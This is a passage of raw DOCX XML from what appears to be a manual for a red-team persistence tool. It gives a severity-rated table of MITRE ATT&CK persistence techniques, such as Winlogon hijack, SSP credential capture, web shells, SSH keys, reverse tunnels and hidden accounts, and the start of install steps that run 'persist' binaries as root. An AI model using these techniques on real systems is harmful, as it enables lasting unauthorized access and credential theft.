                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Fileless — lives in WMI repo, triggers on events</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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6A1B9A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">T1547.004</w:t>
            </w:r>
          </w:p>
        </w:tc>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212121"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Winlogon Helper DLL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Windows</w:t>
            </w:r>
          </w:p>
        </w:tc>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C62828"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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SYSTEM at every logon — Userinit/Shell hijack</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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6A1B9A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">T1547.005</w:t>
            </w:r>
          </w:p>
        </w:tc>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212121"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Security Support Provider</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Windows</w:t>
            </w:r>
          </w:p>
        </w:tc>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C62828"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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LSASS receives plaintext creds on every logon</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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6A1B9A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">T1037.001</w:t>
            </w:r>
          </w:p>
        </w:tc>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212121"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Logon Script</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Windows</w:t>
            </w:r>
          </w:p>
        </w:tc>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F57F17"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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User-context script at logon via userinit.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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6A1B9A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">T1574.001</w:t>
            </w:r>
          </w:p>
        </w:tc>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212121"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">DLL Search Order Hijack</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Windows</w:t>
            </w:r>
          </w:p>
        </w:tc>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E65100"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Trusted process loads attacker DLL from app dir</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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6A1B9A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">T1546.001</w:t>
            </w:r>
          </w:p>
        </w:tc>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212121"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">File Association Hijack</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Windows</w:t>
            </w:r>
          </w:p>
        </w:tc>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F57F17"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Opening any .txt/.html executes payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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6A1B9A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">T1547.009</w:t>
            </w:r>
          </w:p>
        </w:tc>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212121"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Shortcut Modification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Windows</w:t>
            </w:r>
          </w:p>
        </w:tc>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F57F17"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Hijacked .lnk on Desktop/Taskbar</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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6A1B9A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">T1546.015</w:t>
            </w:r>
          </w:p>
        </w:tc>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212121"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">COM Object Hijacking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Windows</w:t>
            </w:r>
          </w:p>
        </w:tc>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E65100"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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HKCU CLSID overrides HKLM — no admin needed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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6A1B9A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">T1547.014</w:t>
            </w:r>
          </w:p>
        </w:tc>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212121"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Active Setup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Windows</w:t>
            </w:r>
          </w:p>
        </w:tc>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E65100"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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StubPath runs once per user at logon</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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6A1B9A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">T1542.001</w:t>
            </w:r>
          </w:p>
        </w:tc>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212121"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">UEFI/Firmware — Demo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Win/Linux</w:t>
            </w:r>
          </w:p>
        </w:tc>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C62828"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Pre-OS — survives reinstall (conceptual)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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6A1B9A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">T1547.010</w:t>
            </w:r>
          </w:p>
        </w:tc>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212121"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Port Monitor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Windows</w:t>
            </w:r>
          </w:p>
        </w:tc>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E65100"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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spoolsv.exe (SYSTEM) loads DLL at boot</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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6A1B9A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">T1547.012</w:t>
            </w:r>
          </w:p>
        </w:tc>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212121"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Print Processor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Windows</w:t>
            </w:r>
          </w:p>
        </w:tc>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E65100"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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spoolsv.exe (SYSTEM) loads DLL at boot</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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6A1B9A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">T1543.002</w:t>
            </w:r>
          </w:p>
        </w:tc>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212121"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Systemd Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Linux</w:t>
            </w:r>
          </w:p>
        </w:tc>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E65100"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Boot-level service — WantedBy=multi-user.target</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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6A1B9A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">T1053.003</w:t>
            </w:r>
          </w:p>
        </w:tc>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212121"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Cron Job</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Linux/macOS</w:t>
            </w:r>
          </w:p>
        </w:tc>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E65100"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Schedule-based — every minute to weekly</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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6A1B9A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">T1546.004</w:t>
            </w:r>
          </w:p>
        </w:tc>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212121"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Shell Profile</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Linux/macOS</w:t>
            </w:r>
          </w:p>
        </w:tc>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F57F17"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Every interactive shell — .bashrc/.zshrc</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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6A1B9A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">T1037.004</w:t>
            </w:r>
          </w:p>
        </w:tc>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212121"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">RC/Init Script</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Linux</w:t>
            </w:r>
          </w:p>
        </w:tc>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E65100"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Root at boot — /etc/rc.local or /etc/init.d/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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6A1B9A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">T1053.003b</w:t>
            </w:r>
          </w:p>
        </w:tc>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212121"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Launchd Plist</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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macOS</w:t>
            </w:r>
          </w:p>
        </w:tc>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E65100"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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LaunchAgent/Daemon — RunAtLoad+KeepAlive</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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6A1B9A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">T1547.006</w:t>
            </w:r>
          </w:p>
        </w:tc>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212121"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Kernel Module — Demo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Linux</w:t>
            </w:r>
          </w:p>
        </w:tc>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C62828"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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LKM rootkit concepts — hooks, process hiding</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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6A1B9A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">T1098.004</w:t>
            </w:r>
          </w:p>
        </w:tc>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212121"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">SSH Authorized Keys</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Cross</w:t>
            </w:r>
          </w:p>
        </w:tc>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E65100"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Passwordless SSH forever — survives reboots</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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6A1B9A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">T1136.001</w:t>
            </w:r>
          </w:p>
        </w:tc>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212121"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Local Account Creation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Cross</w:t>
            </w:r>
          </w:p>
        </w:tc>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E65100"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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New local admin/sudo account</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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6A1B9A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">T1505.003</w:t>
            </w:r>
          </w:p>
        </w:tc>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212121"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Web Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Cross</w:t>
            </w:r>
          </w:p>
        </w:tc>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C62828"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Browser-accessible RCE — PHP/ASPX/JSP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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6A1B9A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">T1176</w:t>
            </w:r>
          </w:p>
        </w:tc>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212121"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Browser Extension</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Cross</w:t>
            </w:r>
          </w:p>
        </w:tc>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F57F17"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Cookie theft, keylogging, C2 via browser</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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6A1B9A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">T1133</w:t>
            </w:r>
          </w:p>
        </w:tc>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212121"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">External Remote Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Cross</w:t>
            </w:r>
          </w:p>
        </w:tc>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E65100"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Reverse SSH tunnel as service/cron</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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6A1B9A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">T1078.003</w:t>
            </w:r>
          </w:p>
        </w:tc>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212121"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Valid Accounts Manipulation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Cross</w:t>
            </w:r>
          </w:p>
        </w:tc>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E65100"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Enable admin, NOPASSWD sudo, hidden accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1565C0" w:sz="6" w:space="6"/>
        </w:pBdr>
        <w:spacing w:before="520" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D1B2A"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">2.  Prerequisites &amp; Installation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="360" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1565C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Pre-built Binaries (Recommended — Zero Setup)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">No Go installation required. Download the binary for your platform and run.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># Linux (Kali, Ubuntu, Debian)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod +x persist_linux_amd64</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo ./persist_linux_amd64          # root for system-level techniques</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># Windows — run PowerShell as Administrator</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">.\persist_windows_amd64.exe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="ECEFF1" w:val="clear"/>
        <w:spacing w:before="16" w:after="16"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># macOS Intel</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
